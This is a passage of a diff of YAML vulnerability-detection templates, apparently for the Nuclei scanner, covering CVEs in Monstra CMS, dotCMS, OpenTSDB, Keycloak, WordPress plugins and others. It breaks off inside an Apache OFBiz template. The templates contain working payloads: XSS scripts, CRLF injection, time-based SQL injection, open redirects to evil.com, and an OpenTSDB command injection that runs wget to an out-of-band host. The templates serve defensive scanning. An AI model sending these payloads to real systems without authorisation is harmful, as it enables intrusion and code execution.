shodan-query: http.favicon.hash:419828698
verified: "true"
tags: cve,cve2018,xss,mostra,mostracms,cms
requests:
- raw:
- |
GET /users/registration HTTP/1.1
Host: {{Hostname}}
- |
POST /users/registration HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
csrf={{csrf}}&login=test&password=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email=teest%40gmail.com&answer=test&register=Register
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "><script>alert(document.domain)</script>"
- "Monstra"
condition: and
case-insensitive: true
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
extractors:
- type: regex
name: csrf
part: body
group: 1
regex:
- 'id="csrf" name="csrf" value="(.*)">'
internal: true

View File

@ -0,0 +1,37 @@
id: CVE-2018-16979
info:
name: Monstra CMS V3.0.4 - HTTP Header Injection
author: 0x_Akoko
severity: medium
description: |
Monstra CMS V3.0.4 allows HTTP header injection in the plugins/captcha/crypt/cryptographp.php cfg parameter.
reference:
- https://github.com/howchen/howchen/issues/4
- https://nvd.nist.gov/vuln/detail/CVE-2018-16979
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-16979
cwe-id: CWE-113
metadata:
verified: "true"
tags: cve,cve2018,crlf,mostra,mostracms,cms
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/captcha/crypt/cryptographp.php?cfg=1%0D%0ASet-Cookie:%20crlfinjection=1"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'new line detected in'
- 'cryptographp.php'
condition: and
- type: status
status:
- 200

View File

@ -7,9 +7,9 @@ info:
description: Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute JavaScript which could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.
reference:
- https://github.com/vulhub/vulhub/blob/master/kibana/CVE-2018-17246/README.md
- https://nvd.nist.gov/vuln/detail/CVE-2018-17246
- https://www.elastic.co/community/security
- https://discuss.elastic.co/t/elastic-stack-6-4-3-and-5-6-13-security-update/155594
- https://nvd.nist.gov/vuln/detail/CVE-2018-17246
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -41,3 +41,5 @@ requests:
part: header
words:
- "application/json"
# Enhanced by mp on 2023/01/15

View File

@ -1,7 +1,7 @@
id: CVE-2018-17422
info:
name: dotCMS <5.0.2 - Open Redirect
name: DotCMS < 5.0.2 - Open Redirect
author: 0x_Akoko,daffainfo
severity: medium
description: |
@ -16,27 +16,22 @@ info:
cve-id: CVE-2018-17422
cwe-id: CWE-601
metadata:
verified: true
shodan-query: http.title:"dotCMS"
verified: "true"
tags: cve,cve2018,redirect,dotcms
requests:
- method: GET
path:
- '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://www.interact.sh'
- '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=interact.sh'
- '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://evil.com'
- '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=evil.com'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "self.location = 'http://www.interact.sh'"
- type: status
status:
- 200
- "self.location = 'http://evil.com'"
- "location.href = 'http\\x3a\\x2f\\x2fwww\\x2eevil\\x2ecom'"
# Enhanced by md on 2022/10/13

View File

@ -11,7 +11,7 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2018-17431
- https://github.com/Fadavvi/CVE-2018-17431-PoC#confirmation-than-bug-exist-2018-09-25-ticket-id-xwr-503-79437
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-17431
cwe-id: CWE-287

View File

@ -3,15 +3,15 @@ id: CVE-2018-19365
info:
name: Wowza Streaming Engine Manager 4.7.4.01 - Directory Traversal
author: 0x_Akoko
severity: high
severity: critical
description: Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request to the REST API.
reference:
- https://blog.gdssecurity.com/labs/2019/2/11/wowza-streaming-engine-manager-directory-traversal-and-local.html
- https://www.cvedetails.com/cve/CVE-2018-19365
- https://raw.githubusercontent.com/WowzaMediaSystems/public_cve/main/wowza-streaming-engine/CVE-2018-19365.txt
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
cvss-score: 9.1
cve-id: CVE-2018-19365
cwe-id: CWE-22
tags: cve,cve2018,wowza,lfi

View File

@ -1,10 +1,10 @@
id: CVE-2019-12616
info:
name: phpMyAdmin < 4.9.0 - CSRF
name: phpMyAdmin <4.9.0 - Cross-Site Request Forgery
author: Mohammedsaneem,philippedelteil,daffainfo
severity: medium
description: A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken <img> tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) through the victim.
description: phpMyAdmin before 4.9.0 is susceptible to cross-site request forgery. An attacker can utilize a broken <img> tag which points at the victim's phpMyAdmin database, thus leading to potential delivery of a payload, such as a specific INSERT or DELETE statement.
reference:
- https://www.phpmyadmin.net/security/PMASA-2019-4/
- https://www.exploit-db.com/exploits/46982
@ -50,3 +50,5 @@ requests:
group: 1
regex:
- '\?v=([0-9.]+)'
# Enhanced by md on 2023/01/11

View File

@ -1,16 +1,16 @@
id: CVE-2019-14530
info:
name: OpenEMR < 5.0.2 - Path Traversal
name: OpenEMR <5.0.2 - Local File Inclusion
author: TenBird
severity: high
description: |
An issue was discovered in custom/ajax_download.php in OpenEMR before 5.0.2 via the fileName parameter. An attacker can download any file (that is readable by the user www-data) from server storage. If the requested file is writable for the www-data user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, it will be deleted from server.
OpenEMR before 5.0.2 is vulnerable to local file inclusion via the fileName parameter in custom/ajax_download.php. An attacker can download any file (that is readable by the web server user) from server storage. If the requested file is writable for the web server user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, the file will be deleted from server.
reference:
- https://www.exploit-db.com/exploits/50037
- https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_7.zip
- https://nvd.nist.gov/vuln/detail/CVE-2019-14530
- https://github.com/openemr/openemr/pull/2592
- https://nvd.nist.gov/vuln/detail/CVE-2019-14530
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
@ -50,3 +50,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2023/01/15

View File

@ -2,9 +2,10 @@ id: CVE-2019-15501
info:
name: L-Soft LISTSERV <16.5-2018a - Cross-Site Scripting
author: LogicalHunter
author: LogicalHunter,arafatansari
severity: medium
description: L-Soft LISTSERV before 16.5-2018a contains a reflected cross-site scripting vulnerability via the /scripts/wa.exe OK parameter.
description: |
L-Soft LISTSERV before 16.5-2018a contains a reflected cross-site scripting vulnerability via the /scripts/wa.exe OK parameter.
reference:
- https://www.exploit-db.com/exploits/47302
- http://www.lsoft.com/manuals/16.5/LISTSERV16.5-2018a_WhatsNew.pdf
@ -14,6 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2019-15501
cwe-id: CWE-79
metadata:
shodan-query: http.html:"LISTSERV"
verified: "true"
tags: cve,cve2019,xss,listserv,edb
requests:
@ -24,9 +28,12 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- '</script><script>alert(document.domain)</script>'
part: body
- 'LISTSERV'
condition: and
case-insensitive: true
- type: word
part: header

View File

@ -9,7 +9,7 @@ info:
- https://www.tenable.com/security/research/tra-2019-03
- https://nvd.nist.gov/vuln/detail/CVE-2019-3911
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-3911
cwe-id: CWE-79

View File

@ -10,7 +10,7 @@ info:
- https://www.cvedetails.com/cve/CVE-2019-3912
- https://nvd.nist.gov/vuln/detail/CVE-2019-3912
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-3912
cwe-id: CWE-601

View File

@ -0,0 +1,32 @@
id: CVE-2019-6802
info:
name: Pypiserver 1.2.5 - CRLF Injection
author: 0x_Akoko
severity: medium
description: |
CRLF Injection in pypiserver 1.2.5 and below allows attackers to set arbitrary HTTP headers and possibly conduct XSS attacks via a %0d%0a in a URI
reference:
- https://vuldb.com/?id.130257
- https://nvd.nist.gov/vuln/detail/CVE-2019-6802
- https://github.com/pypiserver/pypiserver/issues/237
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-6802
cwe-id: CWE-79,CWE-74
metadata:
shodan-query: html:"pypiserver"
verified: "true"
tags: cve,cve2019,crlf,generic,pypiserver
requests:
- method: GET
path:
- "{{BaseURL}}/%0d%0aSet-Cookie:crlfinjection=1;"
matchers:
- type: word
part: header
words:
- 'Set-Cookie: crlfinjection=1;'

View File

@ -7,9 +7,10 @@ info:
description: Grafana through 6.7.1 contains an unauthenticated stored cross-site scripting vulnerability due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot.
reference:
- https://web.archive.org/web/20210717142945/https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html
- https://github.com/grafana/grafana/blob/master/CHANGELOG.md
- https://github.com/grafana/grafana/pull/23254
- https://security.netapp.com/advisory/ntap-20200810-0002/
- https://nvd.nist.gov/vuln/detail/CVE-2020-11110
- https://hackerone.com/reports/1329433
remediation: This issue can be resolved by updating Grafana to the latest version.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@ -18,7 +19,8 @@ info:
cwe-id: CWE-79
metadata:
shodan-query: title:"Grafana"
tags: cve,cve2020,xss,grafana
tags: cve,cve2020,xss,grafana,hackerone
requests:
- raw:

View File

@ -5,6 +5,9 @@ info:
author: x6263
severity: medium
description: PRTG Network Monitor before 20.1.57.1745 allows remote unauthenticated attackers to obtain information about probes running or the server itself via an HTTP request.
metadata:
verified: true
shodan-query: title:"prtg"
reference:
- https://github.com/ch-rigu/CVE-2020-11547--PRTG-Network-Monitor-Information-Disclosure
- https://nvd.nist.gov/vuln/detail/CVE-2020-11547
@ -21,7 +24,9 @@ requests:
path:
- "{{BaseURL}}/public/login.htm?type=probes"
- "{{BaseURL}}/public/login.htm?type=requests"
- "{{BaseURL}}/public/login.htm?type=treestat"
stop-at-first-match: true
req-condition: true
matchers-condition: and
matchers:
@ -33,6 +38,9 @@ requests:
part: body
words:
- "prtg_network_monitor"
- "Probes"
- "Groups"
condition: or
- type: status
status:

View File

@ -15,7 +15,7 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2020-14408
metadata:
verified: true
tags: cve,cve2022,cockpit,agentejo,xss,oss
tags: cve,cve2020,cockpit,agentejo,xss,oss
requests:
- method: GET

View File

@ -5,7 +5,7 @@ info:
author: edoardottt
severity: critical
description: |
Sourcecodester Hotel and Lodge Management System 2.0 is vulnerable to unauthenticated SQL injection and can allow remote attackers to execute arbitrary SQL commands via the email parameter to the edit page for Customer, Room, Currency, Room Booking Details, or Tax Details.
Sourcecodester Hotel and Lodge Management System 2.0 contains a SQL injection vulnerability via the email parameter to the edit page for Customer, Room, Currency, Room Booking Details, or Tax Details. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://github.com/hitIer/web_test/tree/master/hotel
- https://www.sourcecodester.com/php/13707/hotel-and-lodge-management-system.html
@ -35,3 +35,5 @@ requests:
- 'status_code == 200'
- 'contains(body, "Hotel Booking System")'
condition: and
# Enhanced by md on 2022/12/08

View File

@ -0,0 +1,65 @@
id: CVE-2020-23697
info:
name: Monstra CMS V3.0.4 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Cross Site Scripting vulnerabilty in Monstra CMS 3.0.4 via the 'page' feature in admin/index.php.
reference:
- https://github.com/monstra-cms/monstra/issues/463
- https://nvd.nist.gov/vuln/detail/CVE-2020-23697
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2020-23697
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2020,xss,mostra,mostracms,cms,authenticated
variables:
string: "{{to_lower('{{randstr}}')}}"
requests:
- raw:
- |
POST /admin/index.php?id=dashboard HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
login={{username}}&password={{password}}&login_submit=Log+In
- |
GET /admin/index.php?id=pages&action=add_page HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- |
POST /admin/index.php?id=pages&action=add_page HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
csrf={{csrf}}&page_title=%22%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_name={{string}}&page_meta_title=&page_keywords=&page_description=&pages=0&templates=index&status=published&access=public&editor=test&page_tags=&add_page_and_exit=Save+and+Exit&page_date=2023-01-09+18%3A22%3A15
- |
GET /{{string}} HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'contains(all_headers_4, "text/html")'
- 'status_code_4 == 200'
- 'contains(body_4, "><script>alert(document.domain)</script>") && contains(body_4, "Monstra")'
condition: and
extractors:
- type: regex
name: csrf
part: body
group: 1
regex:
- 'id="csrf" name="csrf" value="(.*)">'
internal: true

View File

@ -1,11 +1,11 @@
id: CVE-2020-24902
info:
name: Quixplorer <=2.4.1 - Cross Site Scripting
name: Quixplorer <=2.4.1 - Cross-Site Scripting
author: edoardottt
severity: medium
description: |
Quixplorer <=2.4.1 is vulnerable to reflected cross-site scripting (XSS) caused by improper validation of user supplied input. A remote attacker could exploit this vulnerability using a specially crafted URL to execute a script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.
Quixplorer through 2.4.1 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://dl.packetstormsecurity.net/1804-exploits/quixplorer241beta-xss.txt
- https://nvd.nist.gov/vuln/detail/CVE-2020-24902
@ -44,3 +44,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/12/08

View File

@ -1,11 +1,11 @@
id: CVE-2020-24903
info:
name: Cute Editor for ASP.NET 6.4 - Cross Site Scripting
name: Cute Editor for ASP.NET 6.4 - Cross-Site Scripting
author: edoardottt
severity: medium
description: |
Cute Editor for ASP.NET 6.4 is vulnerable to reflected cross-site scripting (XSS) caused by improper validation of user supplied input. A remote attacker could exploit this vulnerability using a specially crafted URL to execute a script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.
Cute Editor for ASP.NET 6.4 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://seclists.org/bugtraq/2016/Mar/104
- https://nvd.nist.gov/vuln/detail/CVE-2020-24903
@ -17,7 +17,7 @@ info:
metadata:
shodan-query: http.component:"ASP.NET"
verified: "true"
tags: cve,cve2022,cuteeditor,xss,seclists
tags: cve,cve2020,cuteeditor,xss,seclists
requests:
- method: GET
@ -41,3 +41,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/12/08

View File

@ -1,16 +1,17 @@
id: CVE-2020-26248
info:
name: PrestaShop ProductComments < 4.2.0 - SQL Injection
name: PrestaShop Product Comments <4.2.0 - SQL Injection
author: edoardottt
severity: high
description: |
In the PrestaShop module "productcomments" before version 4.2.1, an attacker can use a Blind SQL injection to retrieve data or stop the MySQL service. The problem is fixed in 4.2.1 of the module.
PrestaShop Product Comments module before version 4.2.1 contains a SQL injection vulnerability, An attacker can use a blind SQL injection to retrieve data or stop the MySQL service, thereby possibly obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site.
reference:
- https://packetstormsecurity.com/files/160539/PrestaShop-ProductComments-4.2.0-SQL-Injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-26248
- https://packagist.org/packages/prestashop/productcomments
- https://github.com/PrestaShop/productcomments/security/advisories/GHSA-5v44-7647-xfw9
- https://nvd.nist.gov/vuln/detail/CVE-2020-26248
remediation: Fixed in 4.2.1.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H
cvss-score: 8.2
@ -35,3 +36,5 @@ requests:
- 'contains(content_type, "application/json")'
- 'contains(body, "average_grade")'
condition: and
# Enhanced by md on 2022/12/08

View File

@ -1,16 +1,16 @@
id: CVE-2020-29284
info:
name: Multi Restaurant Table Reservation System 1.0 - SQL Injection
name: Sourcecodester Multi Restaurant Table Reservation System 1.0 - SQL Injection
author: edoardottt
severity: critical
description: |
The file view-chair-list.php in Multi Restaurant Table Reservation System 1.0 does not perform input validation on the table_id parameter which allows unauthenticated SQL Injection. An attacker can send malicious input in the GET request to /dashboard/view-chair-list.php?table_id= to trigger the vulnerability.
Sourcecodester Multi Restaurant Table Reservation System 1.0 contains a SQL injection vulnerability via the file view-chair-list.php. It does not perform input validation on the table_id parameter, which allows unauthenticated SQL injection. An attacker can send malicious input in the GET request to /dashboard/view-chair-list.php?table_id= to trigger the vulnerability.
reference:
- https://www.exploit-db.com/exploits/48984
- https://www.sourcecodester.com/sites/default/files/download/janobe/tablereservation.zip
- https://nvd.nist.gov/vuln/detail/CVE-2020-29284
- https://github.com/BigTiger2020/-Multi-Restaurant-Table-Reservation-System/blob/main/README.md
- https://nvd.nist.gov/vuln/detail/CVE-2020-29284
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -41,3 +41,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/12/08

View File

@ -4,38 +4,43 @@ info:
name: OpenTSDB <= 2.4.0 - Remote Code Execution
author: pikpikcu
severity: critical
description: "OpenTSDB through 2.4.0 and earlier is susceptible to remote code execution via the yrange parameter written to a gnuplot file in the /tmp directory."
description: |
OpenTSDB through 2.4.0 and earlier is susceptible to remote code execution via the yrange parameter written to a gnuplot file in the /tmp directory.
reference:
- https://github.com/OpenTSDB/opentsdb/issues/2051
- https://nvd.nist.gov/vuln/detail/CVE-2020-35476
- http://packetstormsecurity.com/files/170331/OpenTSDB-2.4.0-Command-Injection.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-35476
cwe-id: CWE-78
tags: cve,cve2020,opentsdb,rce
metadata:
verified: true
shodan-query: html:"OpenTSDB"
tags: cve,cve2020,opentsdb,rce,packetstorm
requests:
- method: GET
path:
- "{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://interact.sh%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"
- "{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://{{interactsh-url}}%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- plotted
- timing
- cachehit
part: body
condition: and
- type: word
part: header
words:
- application/json
part: header
# Enhanced by mp on 2022/04/28
- type: status
status:
- 200

View File

@ -0,0 +1,56 @@
id: CVE-2021-20323
info:
name: Keycloak 10.0.0 - 18.0.0 - Cross-Site Scripting
author: ndmalc
severity: medium
description: |
Keycloak 10.0.0 to 18.0.0 contains a cross-site scripting vulnerability via the client-registrations endpoint. On a POST request, the application does not sanitize an unknown attribute name before including it in the error response with a 'Content-Type' of text/hml. Once reflected, the response is interpreted as HTML. This can be performed on any realm present on the Keycloak instance. Since the bug requires Content-Type application/json and is submitted via a POST, there is no common path to exploit that has a user impact.
reference:
- https://github.com/keycloak/keycloak/security/advisories/GHSA-m98g-63qj-fp8j
- https://bugzilla.redhat.com/show_bug.cgi?id=2013577
- https://access.redhat.com/security/cve/CVE-2021-20323
- https://github.com/ndmalc/CVE-2021-20323
- https://github.com/keycloak/keycloak/commit/3aa3db16eac9b9ed8c5335ac86f5f50e0c68662d
- https://nvd.nist.gov/vuln/detail/CVE-2021-20323
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-20323
cwe-id: CWE-79
metadata:
shodan-query: html:"Keycloak"
verified: "true"
tags: cve,cve2021,keycloak,xss
requests:
- method: POST
path:
- "{{BaseURL}}/auth/realms/master/clients-registrations/default"
- "{{BaseURL}}/auth/realms/master/clients-registrations/openid-connect"
- "{{BaseURL}}/realms/master/clients-registrations/default"
- "{{BaseURL}}/realms/master/clients-registrations/openid-connect"
headers:
Content-Type: application/json
body: "{\"Test<img src=x onerror=alert(document.domain)>\":1}"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Unrecognized field "Test<img src=x onerror=alert(document.domain)>'
- type: word
part: header
words:
- text/html
- type: status
status:
- 400
# Enhanced by md on 2023/01/06

View File

@ -1,4 +1,4 @@
id: unpatched-coldfusion
id: CVE-2021-21087
info:
name: Adobe ColdFusion - Remote Code Execution

View File

@ -1,18 +1,15 @@
id: CVE-2021-24227
info:
name: Patreon WordPress < 1.7.0 - Unauthenticated Local File Disclosure
name: Patreon WordPress <1.7.0 - Unauthenticated Local File Inclusion
author: theamanrawat
severity: high
description: The Jetpack Scan team identified a Local File Disclosure vulnerability
in the Patreon WordPress plugin before 1.7.0 that could be abused by anyone visiting
the site. Using this attack vector, an attacker could leak important internal
files like wp-config.php, which contains database credentials and cryptographic
keys used in the generation of nonces and cookies.
description: Patreon WordPress before version 1.7.0 is vulnerable to unauthenticated local file inclusion that could be abused by anyone visiting the site. Exploitation by an attacker could leak important internal files like wp-config.php, which contains database credentials and cryptographic keys used in the generation of nonces and cookies.
reference:
- https://wpscan.com/vulnerability/f62df02d-7678-440f-84a1-ddbf09364016
- https://wordpress.org/plugins/patreon-connect/
- https://jetpack.com/2021/03/26/vulnerabilities-found-in-patreon-wordpress-plugin/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24227
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
@ -34,3 +31,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2023/01/15

View File

@ -0,0 +1,39 @@
id: CVE-2021-24827
info:
name: WordPress Asgaros Forum <1.15.13 - SQL Injection
author: theamanrawat
severity: critical
description: |
WordPress Asgaros Forum plugin before 1.15.13 is susceptible to SQL injection. The plugin does not validate and escape user input when subscribing to a topic before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://wpscan.com/vulnerability/36cc5151-1d5e-4874-bcec-3b6326235db1
- https://wordpress.org/plugins/asgaros-forum/
- https://plugins.trac.wordpress.org/changeset/2611560/asgaros-forum
- https://nvd.nist.gov/vuln/detail/CVE-2021-24827
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-24827
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve2022,wp-plugin,asgaros-forum,unauth,wpscan,cve,wordpress,wp,sqli
requests:
- raw:
- |
@timeout: 15s
GET /forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(6) HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "asgarosforum")'
condition: and
# Enhanced by md on 2023/01/06

View File

@ -0,0 +1,38 @@
id: CVE-2021-24946
info:
name: WordPress Modern Events Calendar <6.1.5 - Blind SQL Injection
author: theamanrawat
severity: critical
description: |
WordPress Modern Events Calendar plugin before 6.1.5 is susceptible to blind SQL injection. The plugin does not sanitize and escape the time parameter before using it in a SQL statement in the mec_load_single_page AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://wpscan.com/vulnerability/09871847-1d6a-4dfe-8a8c-f2f53ff87445
- https://wordpress.org/plugins/modern-events-calendar-lite/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24946
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-24946
cwe-id: CWE-89
metadata:
verified: "true"
tags: wordpress,wp-plugin,wp,unauth,wpscan,cve,cve2021,sqli,modern-events-calendar-lite
requests:
- raw:
- |
@timeout: 10s
GET /wp-admin/admin-ajax.php?action=mec_load_single_page&time=1))%20UNION%20SELECT%20sleep(6)%20--%20g HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200 || status_code == 500'
- 'contains(content_type, "text/html")'
- 'contains(body, "The event is finished") || contains(body, "been a critical error")'
condition: and
# Enhanced by md on 2023/01/06

View File

@ -0,0 +1,40 @@
id: CVE-2021-25099
info:
name: WordPress GiveWP <2.17.3 - Cross-Site Scripting
author: theamanrawat
severity: medium
description: |
WordPress GiveWP plugin before 2.17.3 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the form_id parameter before returning it in the response of an unauthenticated request via the give_checkout_login AJAX action. An attacker can inject arbitrary script in the browser of a user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://wpscan.com/vulnerability/87a64b27-23a3-40f5-a3d8-0650975fee6f
- https://wordpress.org/plugins/give/
- https://nvd.nist.gov/vuln/detail/CVE-2021-25099
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-25099
cwe-id: CWE-79
metadata:
verified: "true"
tags: wp-plugin,wp,give,unauth,wordpress,cve2021,xss,wpscan,cve
requests:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
action=give_checkout_login&form_id=xxxxxx"><script>alert(document.domain)</script>
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "<script>alert(document.domain)</script>")'
- 'contains(body, "give_user_login")'
condition: and
# Enhanced by md on 2023/01/06

View File

@ -39,21 +39,17 @@ requests:
matchers-condition: and
matchers:
- type: regex
regex:
- 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'
- type: word
part: header
words:
- "text/html"
- "application/x-www-form-urlencoded"
condition: or
- type: status
status:
- 200
- type: word
words:
- "text/html"
part: header
- type: word
words:
- "uid="
- "gid="
- "groups="
part: body
condition: and
# Enhanced by mp on 2022/07/15

View File

@ -0,0 +1,58 @@
id: CVE-2021-30128
info:
name: Apache OFBiz <17.12.07 - Arbitrary Code Execution
author: For3stCo1d
severity: critical
description: Apache OFBiz has unsafe deserialization prior to 17.12.07 version
reference:
- https://lists.apache.org/thread.html/rbe8439b26a71fc3b429aa793c65dcc4a6e349bc7bb5010746a74fa1d@%3Ccommits.ofbiz.apache.org%3E
- https://nvd.nist.gov/vuln/detail/CVE-2021-30128
- https://lists.apache.org/thread.html/rb3f5cd65f3ddce9b9eb4d6ea6e2919933f0f89b15953769d11003743%40%3Cdev.ofbiz.apache.org%3E
- https://lists.apache.org/thread.html/rb3f5cd65f3ddce9b9eb4d6ea6e2919933f0f89b15953769d11003743@%3Cdev.ofbiz.apache.org%3E
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-30128
cwe-id: CWE-502
metadata:
fofa-query: app="Apache_OFBiz"
verified: "true"
tags: cve,cve2021,apache,ofbiz,deserialization,rce
requests:
- raw:
- |
POST /webtools/control/SOAPService HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://ofbiz.apache.org/service/">
<soapenv:Header/>
